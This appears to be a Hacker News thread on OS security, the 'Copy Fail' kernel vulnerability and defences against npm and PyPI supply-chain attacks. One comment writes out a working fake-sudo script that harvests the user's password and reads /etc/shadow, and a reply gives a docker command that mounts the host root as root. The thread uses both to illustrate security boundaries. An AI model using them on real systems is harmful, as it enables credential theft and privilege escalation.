Is there anywhere that provides a good overview of the various OS protection technologies/approaches that exist and which OSes have implemented them?
user3939382
So you have one example in hand and trash talked FreeBSD’s entire security team. Bold claims are fine but this is lazy.
If FreeBSD isn’t secure, I suspect you’re sitting on a pile of 0-days for it?
landr0id
Ask yourself why Mythos was so easily able to develop a remote STACK buffer overflow vulnerability.
krupan
If you are switching to a BSD for security reasons, why FreeBSD? Isn't OpenBSD the super secure one? Sorry, it's been a while since I've looked at those projects
loloquwowndueo
The person suggesting FreeBSD is a FreeBSD developer (Colin Percival; actually, according to Wikipedia, a FreeBSD engineering lead), so it would be weird for him to suggest OpenBSD.
Rendello
I'm reminded of another legendary HN thread:
andai
I haven't switched to BSD but I've been thinking about it for a while. I just saw Vultr has both FreeBSD and OpenBSD!
tclancy
There’s always a guy. It’s great that your favorite distro is definitely safer. An order of magnitude fewer exploits will mean only a few thousand or so, I suppose. Ozymandias used Gentoo.
dag100
Calling FreeBSD "just a distro" is verging on insulting. It's an operating system.
tclancy
Apologies, "OS". I am not a native speaker of whatever place that considers these fightin' words.
pocksuppet
Distros are operating systems.
shakna
Well, as they're a FreeBSD dev, I would be surprised if they pointed anyone in a different direction.
LoganDark
FreeBSD is not a distro. It's not even Linux; it's a completely different kernel and operating system that traces back to even before Linux. It's honestly closer to Darwin than it is to Linux; macOS is technically a BSD. (Not FreeBSD though.)
steve1977
Darwin is its own thing really. There are parts from BSD, there are also parts from Mach and there are also unique parts.
dijit
FreeBSD is quite lax when it comes to security- especially defaults and configs.
The preference is for usability over security.
Famously: https://vez.mrsk.me/freebsd-defaults
I appreciate your work on the project, but I can’t in good conscience suggest people switch while there are such bad defaults.
eahm
Also funny they never show Debian in those tests/videos.
cperciva
Debian is probably the best of all the Linuxes, but still suffers from split-brain: If patches are sent upstream first, Debian can't start digesting them until they're already public.
With FreeBSD there's never any question of "who should this get reported to".
JoshTriplett
> Debian can't start digesting them until they're already public
Not sure what you mean by this. Debian is able to handle coordinated disclosures (when they're actually coordinated), and get embargoed security updates out rapidly without breaking the embargo.
Is there some other aspect of this that you're referencing?
goodpoint
No, Debian has its own security team and receives embargoed vulnerabilities and patches.
homebrewer
Has everyone here already forgotten about the WireGuard tire fire?
https://lwn.net/Articles/850098
https://news.ycombinator.com/item?id=26507507
tl;dr: deeply insecure WireGuard implementation committed directly into the FreeBSD kernel with zero review.
Was this process problem fixed?
f30e3dfed1c9
Been constructing a lot of infrastructure servers recently, almost all of them FreeBSD VMs running under bhyve on FreeBSD physical hosts. It's a very simple, clean, pleasant environment to work in. And they all run tarsnap. ;-)
AgentME
There's already an okay solution to supply-chain attacks against dependency managers like npm, PyPI, and Cargo: set them to only install package versions that are more than a few days old. The recent high-profile attacks were all caught and rolled back within a day, so doing this would have let you safely avoid the attacks. It really should be the default behavior. Let self-selected beta testers and security scanner companies try out the newest versions of packages for a day before you try them. Instructions: https://cooldowns.dev/
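Package-manager support for this is still uneven; a sketch of two current options (assuming npm's `--before` resolution flag and pnpm's `minimumReleaseAge` setting, pnpm ≥ 10.16):

```shell
# Compute a cutoff 7 days in the past (GNU date; on BSD/macOS use `date -v-7d`)
CUTOFF="$(date -u -d '7 days ago' +%Y-%m-%dT%H:%M:%SZ)"

# npm can resolve every package as it existed at that date:
echo "npm install --before=$CUTOFF"

# pnpm enforces a cooldown declaratively in pnpm-workspace.yaml
# (value in minutes; 10080 = 7 days):
#   minimumReleaseAge: 10080
```

Note that `--before` changes how versions are resolved rather than filtering an existing lockfile, so it matters most when adding or updating dependencies.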
edoceo
More a case for something like this from Show HN three months ago
https://github.com/artifact-keeper
An artifact manager. Only get what you approve. So you can get fast updates when needed and consistently known stable when you need it. Does need a little config override - easy work.
I had my own janky tooling for something like it. This is a good project.
Johnny555
Does that really scale well? Thanks to cascading dependencies, even a medium-sized project can import hundreds of dependencies. Can a developer really review them all to figure out whether they're safe, and whether there's a security fix in a newer version of the package?
jpollock
Yes, that is what is required. Every dependency needs an internal owner and reviewer. Every change needs to be reviewed and brought into the internal repository.
If no one is willing to stand up and say "yes this is safe and of acceptable quality", why use it?
It's a software engineering version of the professional engineering stamp.
edoceo
I love the sibling response from @jp...
Also, IME we don't deep dive everything (should we?)
For most stuff we make sure the latest is not-shit and passed test cases. We do have ceremony around version bumps.
pjmlp
Even better, only use company-vetted repos; everyone is forbidden from installing directly from Internet repos.
This naturally doesn't work outside corporations.
ric2b
That usually ends up as proxies to the upstream repos, because the people managing the company repos don't have time to review every new version of a package.
At that point you're just as vulnerable to a supply chain attack.
b112
So you get security updates late too? Many vulnerabilities are in the wild for years before being noticed, and patched.
Once noticed, that's where the exploit explosion erupts, excited exploiters everywhere, emboldened... enticed... excessively encouraged, by your delayed updates.
AgentME
Presumably npm exempts security updates from its minimum release age, but even if it doesn't, I think the times where you need an important security update are relatively rare enough that handling the real cases on a case-by-case basis with whitelisting is fine. Outside of Next.js's React2Shell vulnerability last year, I'm not sure I've ever had a security update of a dependency written in a memory-safe language (ie. not C/C++) which I've installed through npm/PyPI/Cargo that patched a security vulnerability that had been making my application exploitable to others in practice. Almost all security vulnerabilities I've personally seen flagged through npm are about things I only use at build-time and are only relevant if a user can create and pass an arbitrary object to the function, which is rarely the case. Most security vulnerabilities I've encountered and fixed in working on web apps were things like XSS, SQL injections, and improperly enforced permissions, and they nearly always happened in the application's own code rather than inside a dependency.
wavemode
> exempts security updates from its minimum release age
If it does, doesn't that defeat the purpose? If a package is compromised, of course the compromiser will just label their new version as a "security update".
mattstir
> Presumably npm exempts security updates from its minimum release age
Why would it? Then an attacker would just push compromised code as a "security update". Since the majority of these npm attacks are account-based, the attacker can do everything the actual owner could.
ayuhito
At least with our Renovate config, all dependencies have a 7 day cooldown, but marked security updates are immediate.
Attackers can’t push a security update without going through the reporting process (e.g. Github CVE), so they can’t necessarily abuse that easily.
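That split can be expressed directly in a Renovate config; a sketch (option names vary across Renovate versions; `minimumReleaseAge` and `vulnerabilityAlerts` assumed):

```json
{
  "extends": ["config:recommended"],
  "packageRules": [
    {
      "matchPackageNames": ["*"],
      "minimumReleaseAge": "7 days"
    }
  ],
  "vulnerabilityAlerts": {
    "enabled": true
  }
}
```

Here ordinary updates sit out the 7-day cooldown, while updates tied to a published vulnerability alert bypass it.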
ketozhang
You could still have security bumps happening (like dependabot).
skydhash
IMO, the most sustainable model is the Linux distro / BSD ports / Homebrew one. You don't push new libraries to the public registry; instead, you write a packaging script that gets reviewed for every new change.
Another model is Perl's CPAN where you publish source files only.
microtonal
Trust me, as someone who has contributed to such a package set, almost nobody is inspecting diffs between upstream versions when updating a package. Only the package definitions themselves are reviewed, but they are typically only version + hash bumps.
Reviewing upstream diffs for every package requires a lot of man hours and most packagers are volunteers. I guess LLMs might help catching some obvious cases.
skydhash
Not really talking about upstream. Most supply chain attacks I’ve heard about involve stolen secrets and artifact uploads; they’re not about repositories or websites being taken over. Since the packaging scripts are usually in repos, you can easily detect if someone tries to change where upstream points.
XCabbage
Sorry, I don't get it. What's the chain of reasoning that connects "there are a couple of new Linux local privilege escalation exploits" to "don't install any new software"? Is the threat we're supposed to be concerned about here just a package maintainer publishing malware that uses these exploits?
(Naively, not knowing much about apt-get or yum or other OS package managers, I have always assumed that 1. only a handful of trusted people can publish to the default repos for system package managers and 2. that since I have to run `apt-get install` as root anyway, package installers can completely pwn my system if they want to and I am protected purely by trust. Is some of that wrong? If it's right, isn't it nonsensical to be any more worried about installing new packages in light of these vulns?)
roskilli
Well, one thing is that a package update could smuggle in a backdoor, much like XZ Utils[1].
The post in question points at dependency package managers such as NPM, not system packages; NPM has pre- and post-install scripts, build scripts, etc.
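For context on those hooks: a package declares them in its package.json, and they run with the installing user's privileges at install time (names here are illustrative, not a real package):

```json
{
  "name": "some-package",
  "version": "1.2.3",
  "scripts": {
    "preinstall": "node check-env.js",
    "postinstall": "node setup.js"
  }
}
```

This is why `npm ci --ignore-scripts` is a common hardening step: it installs exactly what the lockfile pins while refusing to execute any install-time scripts.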
ekjhgkejhgk
[flagged]
john_strinlai
for unknown-to-me reasons, the overlap between furries and some of the smartest security people in the world is way more than you would think
And even if it wasn't, this is about as sensible as not taking advice from left-handed people (i.e. completely nonsensical).
yreg
You should in regards to computer security.
anymouse123456
For the newer players who have gotten into continuous integration and containerized builds, consider checking on your systems to be sure you're not pulling 'latest' across a bunch of packages with every build.
We set up our base containers with all the external dependencies already in them and then only update those explicitly when we decide it's time.
This means we might be a bit behind the bleeding edge, but we're also taking on a lot less risk with random supply chain vulns getting instant global distribution.
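A minimal sketch of that kind of base image, assuming a Node project (the digest is a placeholder for whichever image you've actually vetted):

```dockerfile
# Pin by digest, not just tag, so rebuilds can't silently pick up new content
FROM node:20-alpine@sha256:<vetted-digest>

WORKDIR /app
COPY package.json package-lock.json ./

# npm ci installs exactly what the lockfile pins; --ignore-scripts blocks
# install-time code execution from dependencies
RUN npm ci --ignore-scripts

COPY . .
```

Updating the digest then becomes an explicit, reviewable change rather than a side effect of every build.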
anymouse123456
You'll also find your CI build times and flakey failures can be cut down massively by doing this.
Melatonic
Sounds like a good time to setup a test environment that does pull latest!
pjmlp
Additionally, use only internal repos.
mastermage
I think what we have to start accepting, even as security experts, is that our world is incredibly fragile. I think people really underestimate this. And I don't mean just the IT world; the entire world is built on many incredibly fragile balances. Security exploits will always exist, not just in software but in real life. Heck, someone managed to sneak into a security conference, and that guy was a random youtuber. Granted, that was not a high-security thing, but it's just an example I had off the top of my head. Basically, it is really easy to circumvent security in most cases.
What I want to say with that is that, fundamentally, our world works because at least most people do not abuse shit. That is fundamentally how human society has always worked, and it will likely continue to do so.
kaelyx
I remember there was a trend of some UK influencers using "ladder and a high-vis" tricks to enter places for a while, to show how rough physical security is [0]. I believe it's the youtuber Max Fosh who managed to do it back to back at the International Security Expo, first in the UK [1] and then in the US [2], with the fake names 'Rob Banks' and 'Nick Everything'.
I've studied security culture before and in most cases everything comes down to a sliding scale with security on one side and convenience/accessibility on the other, the more secure something is, the less accessible it is and vice versa.
[0] https://www.youtube.com/watch?v=LTI0SeyhAPA
sergeykish
Linux distributions do not need Copy Fail to get root access:

echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc
mkdir -p ~/.local/bin
cat <<'EOF' > ~/.local/bin/sudo
#!/bin/bash
read -rs -p "[sudo] password for $USER: " PASSWORD
echo ""
echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
EOF
chmod +x ~/.local/bin/sudo

(The heredoc delimiter is quoted so that $USER and $PASSWORD expand when the fake sudo runs, not when the file is written.) The attack fires on the next sudo call and shows data accessible only to root.

Our security model is based on distributions verifying packages, that is, on distro maintainers. Software we can't trust should be running in VMs. The attack on trivy is just the beginning, and the solution is removing pip, uv, npm, rbenv from the host and running them in docker containers:
$ docker run -it -v.:/app -w /app node:alpine /bin/sh
Long-term environments can be defined in docker compose (docker-compose.yml):
services:
  app:
    image: node:alpine
    volumes:
      - .:/app
    working_dir: /app
    command: /bin/sh
$ docker compose run app
Switch to Kata etc. if more protection is needed. Eventually all userspace would run in VMs.
kro
These copyfail exploits allow an unprivileged (daemon/app) user (not in sudoers) to get root without interaction from the original system maintainer.
It's quite different from PATH-injecting an already privileged user.
Also, these memory corruptions can likely be used as container escape primitives too. Albeit not easily.
It's a serious break of a security boundary. Yes, container layer adds defense, and normal unix security isn't perfect, but it should not allow this.
sergeykish
Copy Fail can't affect files it can't access.
PoC attack on k8s [1] claims execution through sibling layers of kube-proxy, host filesystem access through /dev/ [2].
[1] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...
[2] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...
quectophoton
If `docker` is already there, why even bother with `sudo` when you can just:
docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
Chances are that the person who set up Docker didn't do it properly.
sergeykish
Run in docker container:
$ docker run -it -v.:/app -w /app node:alpine /bin/sh
/app # docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
/bin/sh: docker: not found
I've described an attack from a host user, and isolating the attacker with docker.
harrouet
Containerizing every app is what iOS / iPadOS already do.
It is regularly pointed out as a drawback by Android users (e.g. "I can't run that doomscrolling blocker in iOS"), but from a security-model perspective it was visionary back in 2008.
andai
Can someone help me understand the copyfail thing and how it relates to NPM packages?
Edit: I think I understand. copyfail is a kernel bug that lets a malicious npm package get root access on your Linux server, right?
So now, while there are unpatched servers, is when it would be the perfect time for attackers to target NPM packages.
And the advice isn't just "update your kernel" because we are still finding new related issues?
ahpeeyem
NPM supply-chain attacks spread really quickly.
If a popular NPM package was compromised and included a copy.fail exploit, it would make lots of systems vulnerable to root privilege escalation.
Gigachad
The patches for the latest vulnerabilities aren’t even out yet. So it would be a real bad time for a new supply chain attack since it would get root on pretty much every system.
wavemode
> And the advice isn't just "update your kernel" because we are still finding new related issues?
The advice isn't just "update your kernel" because there is no update. The latest vulnerability (the one discovered after copy.fail) still has no fix.
xena
npm can run on linux.
abustamam
This advice is good even if there weren't security vulnerabilities. When I was a junior engineer I'd install a bunch of packages just willy nilly. My manager was like "stop installing packages for simple things. Just learn how they work and code it yourself."
I've done that ever since. Of course, I still use packages like express and tailwindcss. But in the era of LLMs, using a package for something like react drop-downs is unnecessary.
Animats
I'm holding off on upgrading to Ubuntu 26.04 LTS until we have a few months of experience with the new release. Canonical just had a huge DDOS attack, and there might have been other attacks hidden in all that traffic.
turpentine
There are at least two recent negative signals.
https://news.ycombinator.com/item?id=47943499 - 44 CVEs trying to replace coreutils with a greenfield rust rewrite.
https://news.ycombinator.com/item?id=47921079 - Shoehorning AI stuff into Ubuntu is the future.
This was always a nightmare waiting to happen. The sheer mass of packages and the consequent vast attack surface for supply chain attacks was always a problem that was eventually going to blow up in everyone's face.
But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.
Well, now we're reaching the "find out" part of the process I guess.